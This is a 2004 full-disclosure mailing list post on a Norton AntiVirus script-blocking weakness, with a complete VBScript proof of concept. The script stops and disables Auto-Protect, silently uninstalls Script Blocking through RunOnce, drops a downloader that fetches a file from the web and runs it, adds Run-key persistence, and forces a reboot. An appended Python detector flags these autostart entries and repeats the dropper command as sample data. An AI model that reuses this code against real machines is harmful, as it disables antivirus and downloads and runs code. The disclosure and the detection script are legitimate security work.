Message-ID: <4189812E.40202@myrealbox.com>
Date: Wed, 03 Nov 2004 20:09:02 -0500
From: Daniel Milisic <dmilisic@...ealbox.com>
To: full-disclosure@...ts.netsys.com, bugtraq@...urityfocus.com
Subject: Norton AntiVirus 2004/2005 Scripting Vulnerability Pt.3 (Includes PoC VBScript Code)

Hi All,

I have major issues with the quality of Norton AntiVirus. For some history, see:

http://seclists.org/lists/fulldisclosure/2004/Oct/0540.html - Norton AntiVirus 2004 Script Blocking Failure (Rant and PoC enclosed)
http://seclists.org/lists/fulldisclosure/2004/Oct/0775.html - Norton AntiVirus 2004/2005 Script Blocking Redux

Symantec's response to this issue (from a week ago):

"ScriptBlocking is intended to provide proactive detection against script-based worms and this component of Norton AntiVirus has been effective at doing this since its introduction in 2001"

Huh?

Below is a 'typical' script-based virus that Norton AntiVirus will allow a user to run, without *any* intervention on NAV's part whatsoever. It's likely that code similar to this is already appended to script-based threats/worms to assist their penetration in the wild.

In a nutshell, here's what it does. On reboot it sets...

1) The NAV Auto-Protect Service to DISABLED
2) A registry key to uninstall Script Blocking
3) Creates and launches a VBScript file to d/l the EICAR AV 'test' virus
4) Launches the EICAR.COM test pattern a few seconds later

....Then reboots your computer.

The following code was tested under WinXP and a fully LiveUpdated NAV 2005 using a broadband Internet connection. Should be fine for Win2000 and NAV 2004 as well.

--------------//// BEGIN DISABLE_NAV.VBS ////-----------------

' ----- DISABLE NORTON AUTO-PROTECT SERVICE WITH WMI -----
sServer = "."
Set oWMI = GetObject("winmgmts://.")
sServiceName = "Norton AntiVirus Auto-Protect Service"
sWQL = "Select state from Win32_Service " _
    & "Where displayname='" & sServiceName & "'"
Set oResults = oWMI.ExecQuery(sWQL)
For Each oService In oResults
    oService.StopService
    oService.ChangeStartMode("Disabled")
Next

' -------- UNINSTALL SCRIPT BLOCKING WITH WMI ;) ----------
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Uninstall Norton Script Blocking"
arrStringValues = ("MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues

' -------- CREATE VBS FILE TO GRAB THE EICAR AV-REFERENCE FILE ---------
Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Downloader"
arrStringValues = ("cmd /c ECHO Set X=CreateObject("+chr(34)+"Microsoft.XMLHTTP"+chr(34)+"):X.open "+chr(34)+"GET"+chr(34)+",("+chr(34)+"http://www.eicar.org/download/eicar.com"+chr(34)+"),False:X.send:set Y=createobject("+chr(34)+"adodb.stream"+chr(34)+"):Y.type=1:Y.open:Y.write X.responseBody:Y.savetofile("+chr(34)+"eicar.com"+chr(34)+"),2:Y.close > estart.VBS")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues

' -------- CREATE VBS FILE THAT TRIGGERS CODE LAUNCH ----------
Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Launcer"
arrStringValues = ("cmd /c ECHO wscript.sleep(10000):Set Z=CreateObject("+chr(34)+"WSCript.Shell"+chr(34)+"):Z.run("+chr(34)+"cmd /k eicar.com"+chr(34)+") > elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues

' -------- LAUNCH EICAR DOWNLOADER ----------
Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Code DownLoader"
arrStringValues = ("estart.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues

' -------- RUN THE 'VIRUS' ----------
Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Malicious Code Launcher"
arrStringValues = ("elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues

' ---- USE WMI TO FORCE A REBOOT -- NEXT LOGIN, PWN3D ----
Set wmi = GetObject("winmgmts:{(Shutdown)}")
set objset = wmi.instancesof("win32_operatingsystem")
for each obj in objset
    set os = obj : exit for
next
os.win32shutdown 2 + 4

--------------//// END DISABLE_NAV.VBS ////-----------------

Best Regards,
Daniel Milisic

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
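From the defender's side, the persistence the script above relies on is entirely visible in the Run/RunOnce autostart keys. The following Python is an added example, not part of Daniel Milisic's post: it reads a `reg export` (.reg) dump of those keys and flags the three patterns the PoC leaves behind (a silent MSI uninstall, a cmd/echo dropper writing a .vbs, and a bare .vbs launched at logon). The sample export is constructed to mirror the values the PoC writes, plus one benign entry; the product code is the one quoted in the post.

```python
import re

AUTOSTART_KEYS = ("\\CurrentVersion\\Run", "\\CurrentVersion\\RunOnce")

# Constructed sample .reg export, mirroring the values the PoC writes
# (plus one benign entry). The product code is the one from the post.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Execute Code DownLoader"="estart.vbs"
"Execute Malicious Code Launcher"="elaunch.vbs"
"ctfmon"="C:\\WINDOWS\\system32\\ctfmon.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Uninstall Norton Script Blocking"="MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q"
"Create Code Downloader"="cmd /c ECHO Set X=CreateObject(\"Microsoft.XMLHTTP\") > estart.VBS"
'''

def parse_reg(text):
    """Yield (key, value_name, data) for REG_SZ values in a .reg export."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"'):
            m = re.match(r'^"(.+?)"="(.*)"$', line)
            if m:
                # Undo .reg escaping of quotes and backslashes.
                data = m.group(2).replace('\\"', '"').replace("\\\\", "\\")
                yield key, m.group(1), data

def classify(data):
    """Return why an autostart command is suspicious, or None if it is not."""
    d = data.lower()
    if "msiexec" in d and re.search(r"/x\b", d):
        return "silent MSI uninstall from autostart"   # step 2 of the PoC
    if "echo" in d and ">" in d and re.search(r"\.(vbs|js|wsf|bat)\b", d):
        return "cmd/echo script dropper"               # estart/elaunch droppers
    if re.search(r"\.(vbs|js|wsf)$", d):
        return "bare script launched at logon"          # Run values of the PoC
    return None

def find_suspicious(text):
    """Return (subkey, value name, reason) for every flagged autostart entry."""
    hits = []
    for key, name, data in parse_reg(text):
        reason = classify(data) if key.endswith(AUTOSTART_KEYS) else None
        if reason:
            hits.append((key.rsplit("\\", 1)[1], name, reason))
    return hits
```

Run `find_suspicious(SAMPLE_REG)` to list the four flagged entries; on a live machine, feed it the output of `reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion` instead of the constructed sample.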